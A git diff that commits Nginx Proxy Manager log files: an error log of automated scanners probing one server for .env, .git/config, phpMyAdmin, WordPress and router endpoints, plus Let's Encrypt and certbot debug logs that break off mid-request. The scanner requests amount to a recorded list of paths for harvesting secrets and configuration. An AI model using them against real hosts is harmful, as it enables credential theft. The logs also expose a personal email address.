[error] 304#304: *19820 "/var/www/html/geoserver/web/index.html" is not found (2: No such file or directory), client: 216.218.206.69, server: localhost-nginx-proxy-manager, request: "GET /geoserver/web/ HTTP/1.1", host: "78.131.122.113" +2026/02/02 04:20:11 [error] 304#304: *19821 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 05:04:54 [error] 304#304: *19841 open() "/var/www/html/login.asp" failed (2: No such file or directory), client: 146.19.24.133, server: localhost-nginx-proxy-manager, request: "GET /login.asp HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 07:40:24 [error] 302#302: *19918 "/var/www/html/bins/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /bins/ HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 07:49:39 [error] 302#302: *19922 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 91.224.92.115, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 08:48:25 [error] 302#302: *21449 open() "/var/www/html/wiki" failed (2: No such file or directory), client: 162.142.125.220, server: localhost-nginx-proxy-manager, request: "GET /wiki HTTP/1.1", host: "78.131.122.113" +2026/02/02 09:19:08 [error] 302#302: *21456 "/var/www/html/bin/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /bin/ HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 09:22:50 [error] 302#302: *21459 open() "/var/www/html/_next" failed (2: No such file or directory), client: 2.58.56.147, server: localhost-nginx-proxy-manager, request: "POST /_next HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 09:22:51 [error] 302#302: *21460 open() "/var/www/html/api" failed (2: No such file or directory), client: 2.58.56.147, server: localhost-nginx-proxy-manager, request: "POST /api HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 09:22:51 [error] 303#303: *21461 open() "/var/www/html/_next/server" failed (2: No such file or directory), client: 2.58.56.147, server: localhost-nginx-proxy-manager, request: "POST /_next/server HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 09:22:52 [error] 303#303: *21462 open() "/var/www/html/app" failed (2: No such file or directory), client: 2.58.56.147, server: localhost-nginx-proxy-manager, request: "POST /app HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 09:22:52 [error] 303#303: *21463 open() "/var/www/html/api/route" failed (2: No such file or directory), client: 2.58.56.147, server: localhost-nginx-proxy-manager, request: "POST /api/route HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 10:02:42 [error] 302#302: *22962 open() "/var/www/html/login" failed (2: No such file or directory), client: 193.142.146.230, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 10:06:27 [error] 302#302: *22973 open() "/var/www/html/ncsi.txt" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET http://www.msftncsi.com/ncsi.txt HTTP/1.1", host: "www.msftncsi.com", referrer: "http://78.131.122.113/" +2026/02/02 10:06:27 [error] 302#302: *22974 "/var/www/html/HNAP1/index.html" is not found (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /HNAP1/ HTTP/1.1", host: "78.131.122.113", referrer: "http://78.131.122.113/" +2026/02/02 11:06:34 [error] 311#311: *23016 "/var/www/html/phpmyadmin/index.html" is not found (2: No such file or directory), client: 122.9.140.40, server: localhost-nginx-proxy-manager, request: "HEAD /phpmyadmin/ HTTP/1.1", host: "78.131.122.113" +2026/02/02 11:06:35 [error] 311#311: *23017 "/var/www/html/mysqladmin/index.html" is not found (2: No such file or directory), client: 122.9.140.40, server: localhost-nginx-proxy-manager, request: "HEAD /mysqladmin/ HTTP/1.1", host: "78.131.122.113" +2026/02/02 11:06:35 [error] 311#311: *23018 "/var/www/html/phpMyAdmin4.8.5/index.html" is not found (2: No such file or directory), client: 122.9.140.40, server: localhost-nginx-proxy-manager, request: "HEAD /phpMyAdmin4.8.5/ HTTP/1.1", host: "78.131.122.113" +2026/02/02 11:06:35 [error] 311#311: *23019 "/var/www/html/pma/index.html" is not found (2: No such file or directory), client: 122.9.140.40, server: localhost-nginx-proxy-manager, request: "HEAD /pma/ HTTP/1.1", host: "78.131.122.113" +2026/02/02 11:06:36 [error] 311#311: *23020 "/var/www/html/pmd/index.html" is not found (2: No such file or directory), client: 122.9.140.40, server: localhost-nginx-proxy-manager, request: "HEAD /pmd/ HTTP/1.1", host: "78.131.122.113" +2026/02/02 11:57:18 [error] 311#311: *23033 open() "/var/www/html/cgi/conf.bin" failed (2: No such file or directory), client: 194.50.16.253, server: localhost-nginx-proxy-manager, request: "GET /cgi/conf.bin HTTP/1.1", host: "78.131.122.113", referrer: "http://78.131.122.113:80/mainFrame.htm" +2026/02/02 13:03:43 [error] 312#312: *23063 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 13:12:26 [error] 312#312: *23067 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 213.209.159.181, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "78.131.122.113" +2026/02/02 14:51:29 [error] 311#311: *26084 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 15:29:28 [error] 311#311: *26107 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 213.209.159.181, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "78.131.122.113" +2026/02/02 15:40:59 [error] 311#311: *26112 open() "/var/www/html/developmentserver/metadatauploader" failed (2: No such file or directory), client: 20.64.106.155, server: localhost-nginx-proxy-manager, request: "GET /developmentserver/metadatauploader HTTP/1.1", host: "78.131.122.113" +2026/02/02 15:45:33 [error] 311#311: *26115 open() "/var/www/html/.env" failed (2: No such file or directory), client: 45.119.83.253, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "78.131.122.113" +2026/02/02 15:45:36 [error] 312#312: *26117 open() "/var/www/html/env" failed (2: No such file or directory), client: 45.119.83.253, server: localhost-nginx-proxy-manager, request: "GET /env HTTP/1.1", host: "78.131.122.113" +2026/02/02 15:56:44 [error] 312#312: *26123 open() "/var/www/html/.env" failed (2: No such file or directory), client: 45.119.83.253, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "78.131.122.113" +2026/02/02 15:56:46 [error] 312#312: *26125 open() "/var/www/html/env" failed (2: No such file or directory), client: 45.119.83.253, server: localhost-nginx-proxy-manager, request: "GET /env HTTP/1.1", host: "78.131.122.113" +2026/02/02 16:06:48 [error] 312#312: *26130 open() "/var/www/html/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.46.194.83, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/02 16:06:49 [error] 312#312: *26130 open() "/var/www/html/xmlrpc.php" failed (2: No such file or directory), client: 34.46.194.83, server: localhost-nginx-proxy-manager, request: "GET /xmlrpc.php?rsd HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/02 16:06:50 [error] 312#312: *26130 open() "/var/www/html/blog/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.46.194.83, server: localhost-nginx-proxy-manager, request: "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/02 16:06:50 [error] 312#312: *26130 open() "/var/www/html/web/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.46.194.83, server: localhost-nginx-proxy-manager, request: "GET /web/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/02 16:06:51 [error] 312#312: *26130 open() "/var/www/html/wordpress/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.46.194.83, server: localhost-nginx-proxy-manager, request: "GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/02 16:06:51 [error] 312#312: *26130 open() "/var/www/html/website/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.46.194.83, server: localhost-nginx-proxy-manager, request: "GET /website/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/02 16:06:52 [error] 312#312: *26130 open() "/var/www/html/wp/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.46.194.83, server: localhost-nginx-proxy-manager, request: "GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/02 16:06:52 [error] 312#312: *26130 open() "/var/www/html/news/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.46.194.83, server: localhost-nginx-proxy-manager, request: "GET /news/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/02 16:06:53 [error] 312#312: *26130 open() "/var/www/html/2018/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.46.194.83, server: localhost-nginx-proxy-manager, request: "GET /2018/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/02 16:06:53 [error] 312#312: *26130 open() "/var/www/html/2019/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.46.194.83, server: localhost-nginx-proxy-manager, request: "GET /2019/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/02 16:06:54 [error] 312#312: *26130 open() "/var/www/html/shop/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.46.194.83, server: localhost-nginx-proxy-manager, request: "GET /shop/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/02 16:06:54 [error] 312#312: *26130 open() "/var/www/html/wp1/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.46.194.83, server: localhost-nginx-proxy-manager, request: "GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/02 16:06:55 [error] 312#312: *26130 open() "/var/www/html/test/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.46.194.83, server: localhost-nginx-proxy-manager, request: "GET /test/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/02 16:06:55 [error] 312#312: *26130 open() "/var/www/html/media/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.46.194.83, server: localhost-nginx-proxy-manager, request: "GET /media/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/02 16:06:56 [error] 312#312: *26130 open() "/var/www/html/wp2/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.46.194.83, server: localhost-nginx-proxy-manager, request: "GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/02 16:06:56 [error] 312#312: *26130 open() "/var/www/html/site/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.46.194.83, server: localhost-nginx-proxy-manager, request: "GET /site/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/02 16:06:57 [error] 312#312: *26130 open() "/var/www/html/cms/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.46.194.83, server: localhost-nginx-proxy-manager, request: "GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/02 16:06:57 [error] 312#312: *26130 open() "/var/www/html/sito/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.46.194.83, server: localhost-nginx-proxy-manager, request: "GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/02 19:51:15 [error] 318#318: *28437 open() "/var/www/html/actuator/gateway/routes" failed (2: No such file or directory), client: 79.124.40.174, server: localhost-nginx-proxy-manager, request: "GET /actuator/gateway/routes HTTP/1.1", host: "78.131.122.113:80" +2026/02/02 20:11:29 [error] 318#318: *28574 open() "/var/www/html/ncsi.txt" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET http://www.msftncsi.com/ncsi.txt HTTP/1.1", host: "www.msftncsi.com", referrer: "http://78.131.122.113/" +2026/02/02 20:11:29 [error] 318#318: *28575 "/var/www/html/HNAP1/index.html" is not found (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /HNAP1/ HTTP/1.1", host: "78.131.122.113", referrer: "http://78.131.122.113/" +2026/02/02 20:39:04 [error] 319#319: *28777 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "78.131.122.113:80" diff --git a/proxy-manager/data/logs/fallback_error.log.1.gz b/proxy-manager/data/logs/fallback_error.log.1.gz new file mode 100755 index 0000000..8941f79 Binary files /dev/null and b/proxy-manager/data/logs/fallback_error.log.1.gz differ diff --git a/proxy-manager/data/logs/fallback_error.log.2.gz b/proxy-manager/data/logs/fallback_error.log.2.gz new file mode 100755 index 0000000..055f46e Binary files /dev/null and b/proxy-manager/data/logs/fallback_error.log.2.gz differ diff --git a/proxy-manager/data/logs/fallback_error.log.3.gz b/proxy-manager/data/logs/fallback_error.log.3.gz new file mode 100755 index 0000000..ea43621 Binary files /dev/null and b/proxy-manager/data/logs/fallback_error.log.3.gz differ diff --git a/proxy-manager/data/logs/letsencrypt-requests_access.log b/proxy-manager/data/logs/letsencrypt-requests_access.log new file mode 100755 index 0000000..fab6153 --- /dev/null +++ b/proxy-manager/data/logs/letsencrypt-requests_access.log @@ -0,0 +1,22 @@ +[19/Jan/2026:23:22:58 +0000] 200 - GET http code.profibot.hu "/.well-known/acme-challenge/OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" [Client 23.178.112.219] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[19/Jan/2026:23:22:59 +0000] 200 - GET http code.profibot.hu "/.well-known/acme-challenge/OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" [Client 13.60.85.11] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[19/Jan/2026:23:22:59 +0000] 200 - GET http code.profibot.hu "/.well-known/acme-challenge/OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" [Client 35.86.77.117] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[19/Jan/2026:23:22:59 +0000] 200 - GET http code.profibot.hu "/.well-known/acme-challenge/OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" [Client 54.255.179.68] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[20/Jan/2026:19:14:22 +0000] 200 - GET http app.profibot.hu "/.well-known/acme-challenge/fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" [Client 23.178.112.107] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[20/Jan/2026:19:14:22 +0000] 200 - GET http app.profibot.hu "/.well-known/acme-challenge/fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" [Client 13.50.249.107] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[20/Jan/2026:19:14:22 +0000] 200 - GET http app.profibot.hu "/.well-known/acme-challenge/fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" [Client 35.89.149.75] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[20/Jan/2026:19:14:22 +0000] 200 - GET http app.profibot.hu "/.well-known/acme-challenge/fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" [Client 13.215.154.21] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[27/Jan/2026:23:19:24 +0000] 200 - GET http terminal.profibot.hu "/.well-known/acme-challenge/KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" [Client 23.178.112.213] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[27/Jan/2026:23:19:24 +0000] 200 - GET http terminal.profibot.hu "/.well-known/acme-challenge/KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" [Client 16.16.94.63] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[27/Jan/2026:23:19:25 +0000] 200 - GET http terminal.profibot.hu "/.well-known/acme-challenge/KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" [Client 16.144.154.22] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[27/Jan/2026:23:19:25 +0000] 200 - GET http terminal.profibot.hu "/.well-known/acme-challenge/KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" [Client 52.77.229.17] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[27/Jan/2026:23:21:31 +0000] 200 - GET http terminal.profibot.hu "/.well-known/acme-challenge/ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" [Client 23.178.112.107] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[27/Jan/2026:23:21:31 +0000] 200 - GET http terminal.profibot.hu "/.well-known/acme-challenge/ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" [Client 13.53.140.14] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[27/Jan/2026:23:21:31 +0000] 200 - GET http terminal.profibot.hu "/.well-known/acme-challenge/ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" [Client 54.213.198.206] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[27/Jan/2026:23:21:32 +0000] 200 - GET http terminal.profibot.hu "/.well-known/acme-challenge/ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" [Client 52.77.229.17] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[31/Jan/2026:10:05:23 +0000] 200 - GET http net.profibot.hu "/.well-known/acme-challenge/9iGNFW6EvQxQe-hcWyitqZPIznE-jNZDyCPKP-ml-pQ" [Client 23.178.112.219] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[31/Jan/2026:10:05:23 +0000] 200 - GET http net.profibot.hu "/.well-known/acme-challenge/9iGNFW6EvQxQe-hcWyitqZPIznE-jNZDyCPKP-ml-pQ" [Client 16.171.58.127] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[31/Jan/2026:10:05:24 +0000] 200 - GET http net.profibot.hu "/.well-known/acme-challenge/9iGNFW6EvQxQe-hcWyitqZPIznE-jNZDyCPKP-ml-pQ" [Client 3.131.96.56] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[31/Jan/2026:10:05:24 +0000] 200 - GET http net.profibot.hu "/.well-known/acme-challenge/9iGNFW6EvQxQe-hcWyitqZPIznE-jNZDyCPKP-ml-pQ" [Client 44.249.140.139] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[31/Jan/2026:10:05:25 +0000] 200 - GET http net.profibot.hu "/.well-known/acme-challenge/9iGNFW6EvQxQe-hcWyitqZPIznE-jNZDyCPKP-ml-pQ" [Client 46.137.228.249] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[31/Jan/2026:10:05:31 +0000] 404 - HEAD http net.profibot.hu "/" [Client 195.123.244.84] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" "-" diff --git a/proxy-manager/data/logs/letsencrypt-requests_access.log.1.gz b/proxy-manager/data/logs/letsencrypt-requests_access.log.1.gz new file mode 100755 index 0000000..156dd60 Binary files /dev/null and b/proxy-manager/data/logs/letsencrypt-requests_access.log.1.gz differ diff --git a/proxy-manager/data/logs/letsencrypt-requests_error.log b/proxy-manager/data/logs/letsencrypt-requests_error.log new file mode 100755 index 0000000..e69de29 diff --git a/proxy-manager/data/logs/letsencrypt.log b/proxy-manager/data/logs/letsencrypt.log new file mode 100755 index 0000000..0dcdb24 --- /dev/null +++ b/proxy-manager/data/logs/letsencrypt.log @@ -0,0 +1,555 @@ +2026-01-31 10:05:21,046:DEBUG:certbot._internal.main:certbot version: 5.1.0 +2026-01-31 10:05:21,046:DEBUG:certbot._internal.main:Location of certbot entry point: /opt/certbot/bin/certbot +2026-01-31 10:05:21,046:DEBUG:certbot._internal.main:Arguments: ['--config', '/etc/letsencrypt.ini', '--work-dir', '/tmp/letsencrypt-lib', '--logs-dir', '/data/logs', '--cert-name', 'npm-19', '--agree-tos', '--authenticator', 'webroot', '-m', 'kincses@gmail.com', '--preferred-challenges', 'http', '--domains', 'net.profibot.hu'] +2026-01-31 10:05:21,046:DEBUG:certbot._internal.main:Discovered plugins: PluginsRegistry(PluginEntryPoint#manual,PluginEntryPoint#null,PluginEntryPoint#standalone,PluginEntryPoint#webroot) +2026-01-31 10:05:21,057:DEBUG:certbot._internal.log:Root logging level set at 30 +2026-01-31 10:05:21,058:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None +2026-01-31 10:05:21,058:DEBUG:certbot._internal.plugins.selection:Single candidate plugin: * webroot +Description: Saves the necessary validation files to a .well-known/acme-challenge/ directory within the nominated webroot path. A separate HTTP server must be running and serving files from the webroot path. HTTP challenge only (wildcards not supported). +Interfaces: Authenticator, Plugin +Entry point: EntryPoint(name='webroot', value='certbot._internal.plugins.webroot:Authenticator', group='certbot.plugins') +Initialized: +Prep: True +2026-01-31 10:05:21,058:DEBUG:certbot._internal.plugins.selection:Selected authenticator and installer None +2026-01-31 10:05:21,058:INFO:certbot._internal.plugins.selection:Plugins selected: Authenticator webroot, Installer None +2026-01-31 10:05:21,100:DEBUG:certbot._internal.main:Picked account: +2026-01-31 10:05:21,101:DEBUG:acme.client:Sending GET request to https://acme-v02.api.letsencrypt.org/directory. +2026-01-31 10:05:21,102:DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): acme-v02.api.letsencrypt.org:443 +2026-01-31 10:05:21,547:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "GET /directory HTTP/1.1" 200 1033 +2026-01-31 10:05:21,548:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Sat, 31 Jan 2026 10:05:21 GMT +Content-Type: application/json +Content-Length: 1033 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "LIwH_GRf5YM": "https://community.letsencrypt.org/t/adding-random-entries-to-the-directory/33417", + "keyChange": "https://acme-v02.api.letsencrypt.org/acme/key-change", + "meta": { + "caaIdentities": [ + "letsencrypt.org" + ], + "profiles": { + "classic": "https://letsencrypt.org/docs/profiles#classic", + "shortlived": "https://letsencrypt.org/docs/profiles#shortlived", + "tlsclient": "https://letsencrypt.org/docs/profiles#tlsclient", + "tlsserver": "https://letsencrypt.org/docs/profiles#tlsserver" + }, + "termsOfService": "https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf", + "website": "https://letsencrypt.org" + }, + "newAccount": "https://acme-v02.api.letsencrypt.org/acme/new-acct", + "newNonce": "https://acme-v02.api.letsencrypt.org/acme/new-nonce", + "newOrder": "https://acme-v02.api.letsencrypt.org/acme/new-order", + "renewalInfo": "https://acme-v02.api.letsencrypt.org/acme/renewal-info", + "revokeCert": "https://acme-v02.api.letsencrypt.org/acme/revoke-cert" +} +2026-01-31 10:05:21,549:DEBUG:certbot._internal.display.obj:Notifying user: Requesting a certificate for net.profibot.hu +2026-01-31 10:05:21,571:DEBUG:acme.client:Requesting fresh nonce +2026-01-31 10:05:21,571:DEBUG:acme.client:Sending HEAD request to https://acme-v02.api.letsencrypt.org/acme/new-nonce. +2026-01-31 10:05:21,715:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "HEAD /acme/new-nonce HTTP/1.1" 200 0 +2026-01-31 10:05:21,716:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Sat, 31 Jan 2026 10:05:21 GMT +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: ay3RMBSdRjpAZzYo0by-sHzckU6a2tTNny33tQ3_9b_aDrxr8Qg +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + + +2026-01-31 10:05:21,716:DEBUG:acme.client:Storing nonce: ay3RMBSdRjpAZzYo0by-sHzckU6a2tTNny33tQ3_9b_aDrxr8Qg +2026-01-31 10:05:21,717:DEBUG:acme.client:JWS payload: +b'{\n "identifiers": [\n {\n "type": "dns",\n "value": "net.profibot.hu"\n }\n ]\n}' +2026-01-31 10:05:21,726:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-order: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJheTNSTUJTZFJqcEFaellvMGJ5LXNIemNrVTZhMnRUTm55MzN0UTNfOWJfYURyeHI4UWciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL25ldy1vcmRlciJ9", + "signature": "KTTtONPlFNjLvwrvPDUpiP6nCEzPdxZQHB1YHYyKO-W3T1OFbacZFlNppBg9u38o3JbLrCn-TTOqN998cMIB4D7TRAnX_I_NyRTA2lgjj6w4SER_9arNPaeD4Gwl4_mRGM1ZRt-ggXIDDQll4v2GD_Gdl0dkPIXZxo1fTsw600syj_BAjBKJjr8aIArG77YIcmW27Nd16B9sOk3nvrHN_68tBOpRzxN30kgssu6Q70pM3VOdfShH7vbSfjjLs8kNE7YWb8nb4ss0JIER8jcXabIpIxcOWHDUmCb_NcNoXme3Hr0VuTr5uPLLb7Kx98sA0zbotMte-ZjsR25eLllR8g", + "payload": "ewogICJpZGVudGlmaWVycyI6IFsKICAgIHsKICAgICAgInR5cGUiOiAiZG5zIiwKICAgICAgInZhbHVlIjogIm5ldC5wcm9maWJvdC5odSIKICAgIH0KICBdCn0" +} +2026-01-31 10:05:22,534:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-order HTTP/1.1" 201 349 +2026-01-31 10:05:22,535:DEBUG:acme.client:Received response: +HTTP 201 +Server: nginx +Date: Sat, 31 Jan 2026 10:05:22 GMT +Content-Type: application/json +Content-Length: 349 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Location: https://acme-v02.api.letsencrypt.org/acme/order/2906438176/475360564716 +Replay-Nonce: yEIP-nqMUJsHnULtqoY1n5aS7TQlpYtVUUuEhPYjLkjcfsmO_G0 +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "status": "pending", + "expires": "2026-02-07T10:05:22Z", + "identifiers": [ + { + "type": "dns", + "value": "net.profibot.hu" + } + ], + "authorizations": [ + "https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/651537632216" + ], + "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/2906438176/475360564716" +} +2026-01-31 10:05:22,536:DEBUG:acme.client:Storing nonce: yEIP-nqMUJsHnULtqoY1n5aS7TQlpYtVUUuEhPYjLkjcfsmO_G0 +2026-01-31 10:05:22,536:DEBUG:acme.client:JWS payload: +b'' +2026-01-31 10:05:22,540:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/651537632216: +{ + "protected": 